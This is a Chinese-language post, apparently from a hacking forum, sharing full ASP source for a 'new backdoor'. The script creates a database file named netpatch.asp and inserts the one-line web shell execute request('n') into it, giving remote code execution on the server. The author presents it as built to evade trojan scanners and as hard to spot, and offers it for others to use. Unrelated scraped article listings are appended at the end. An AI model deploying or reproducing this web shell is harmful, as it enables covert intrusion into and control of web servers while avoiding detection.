新型ASP后门源代码分析

本是为了逃LAKER2兄 查ASP木马程序的 

现在已经挑战成功,已经加为检查对象了。公布出代码给冰点的朋友使使,希望大家喜欢!

利用的是ADOX.Catalog组件

复制代码 代码如下:<%   

'code by netpatch  

dim dbfile,sql   

db="netpatch.asp"  

dbfile=server.MapPath(db)

set ydb=server.CreateObject("ADOX.Catalog")   

ydb.Create "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=" & dbfile   

set ydb=nothing   

if err.number=0 then   

Response.Write dbfile & " 创建成功<br> "   

else   

Response.Write "创建失败,原因: " & err.description   

Response.End   

end if

Set Conn = Server.CreateObject("ADODB.Connection")   

Conn.Open "Provider=Microsoft.Jet.OLEDB.4.0; Data Source=" & dbfile

sql="CREATE TABLE fdata([data] Memo)"   

conn.execute(sql)

Set rs = CreateObject("ADODB.RecordSet")   

rs.Open "FData", conn, 1, 3   

rs.addnew   

rs("data")="<%execute request(“n”))%>" '(注释记得去掉!一句话后门 execute request(“n”))  

rs.update

%>  此脚本主要是利用ADOX.Catalog组件 

新建一个名称为netpatch.asp的空数据库文件 

然后把一句话木马插入新建的表中作为C/S版本的ASP马用!

优点,比较隐蔽,不容易让人看出这是什么作用的!

时间: 2024-10-25 06:33:44

新型ASP后门源代码分析的相关文章

新型ASP后门源代码分析_木马相关

本是为了逃LAKER2兄 查ASP木马程序的  现在已经挑战成功,已经加为检查对象了.公布出代码给冰点的朋友使使,希望大家喜欢!  利用的是ADOX.Catalog组件  复制代码 代码如下: <%    'code by netpatch   dim dbfile,sql    db="netpatch.asp"   dbfile=server.MapPath(db)    set ydb=server.CreateObject("ADOX.Catalog"

asp.net-小白看一段ASP.NET源代码时碰到的问题

问题描述 小白看一段ASP.NET源代码时碰到的问题 1C 图里面的 登录,注册,管理员登陆均点不了,其他功能正常.相关源代码: web层 <%@ Page Language=""C#"" AutoEventWireup=""true"" CodeBehind=""Gbook.aspx.cs"" Inherits=""_28_1.Gbook""

FreeBSD 5.0中强制访问控制机制的使用与源代码分析(2)

本文主要讲述FreeBSD 5.0操作系统中新增的重要安全机制,即强制访问控制机制(MAC)的使用与源代码分析,主要包括强制访问控制框架及多级安全(MLS)策略两部分内容.这一部分较系统地对MAC框架及MLS策略的源代码进行分析. 2 MAC框架与MLS策略源代码分析 与本文相关的源代码文件主要有两个,即 /usr/src/sys/kern/kern_mac.c 和 /usr/src/sys/security/mac_mls/mac_mls.c .另外还有一些头文件如mac.h.mac_poli

FreeBSD 5.0中强制访问控制机制的使用与源代码分析(1)

本文主要讲述FreeBSD 5.0操作系统中新增的重要安全机制,即强制访问控制机制(MAC)的使用与源代码分析,主要包括强制访问控制框架及多级安全(MLS)策略两部分内容.这一部分讲述要将MAC框架与MLS策略用起来,应该做的一些工作,以及如何有效使用它们的问题. 强制访问控制(英文缩写MAC)是实现操作系统安全的一个重要的方法,现在几乎所有的安全操作系统都采用强制访问控制作为其核心安全机制之一.强制访问控制是对操作系统的各种客体(如文件.socket.系统FIFO.SCD.IPC等)进行细粒度

slab内存管理源代码分析

学习计算机原理,最好是实践或看高手写的源代码,在一定程度上就不再会感到原理的抽象.关于slab一些原理资料,可以在这里下载或到网站有更多的信息和资料.Slab内存管理机制已被广泛使用,要找到使用slab管理内存的开源代码也不难,如一些OS内核中的内存管理.既然要分析理解slab,最好还是选择复杂度和代码量都不要太大的,在这里我选取了glib-2.12.9的gslice.c实现的slab机制相关代码作为分析对象.注意Glib库是针对用户级的而非OS内核级别的. gslice.c中实现了三种内存分配

Spring源代码分析-XmlBeanFactory导读

源代码分析,是一件既痛苦又快乐的事情,看别人写的代码是通过的,但当你能够看 明白的时候,相信快乐也会随之而来,为了减少痛苦,更快的带来快乐,在这里希望通过 这篇文章对觉得困难的朋友有一个帮助. 首先来打开该类的代码,我们将看到如下代码: Java代码 public class XmlBeanFactory extends DefaultListableBeanFactory { private final XmlBeanDefinitionReader reader = new XmlBeanD

Glibc 的malloc源代码分析

Glibc 的 malloc 源代码分析 有人写了一个测试程序 #include <stdlib.h> #include <unistd.h> #include <string.h> #include <malloc.h> main() {   int alloc_time = 20000;   char* a[alloc_time];   char* b[alloc_time]; for(int j=0; j<5; j++) {   for(int

Android ArrayMap源代码分析_Android

      分析源码之前先来介绍一下ArrayMap的存储结构,ArrayMap数据的存储不同于HashMap和SparseArray. Java提供了HashMap,但是HashMap对于手机端而言,对空间的利用太大,所以Android提供了SparseArray和ArrayMap.二者都是基于二分查找,所以数据量大的时候,最坏效率会比HashMap慢很多.因此建议数量在千以内比较合适.  一.SparseArray SparseArray对应的key只能是int类型,它不会对key进行装箱操

Android系统进程间通信Binder机制在应用程序框架层的Java接口源代码分析_Android

        在前面几篇文章中,我们详细介绍了Android系统进程间通信机制Binder的原理,并且深入分析了系统提供的Binder运行库和驱动程序的源代码.细心的读者会发现,这几篇文章分析的Binder接口都是基于C/C++语言来实现的,但是我们在编写应用程序都是基于Java语言的,那么,我们如何使用Java语言来使用系统的Binder机制来进行进程间通信呢?这就是本文要介绍的Android系统应用程序框架层的用Java语言来实现的Binder接口了.        熟悉Android系统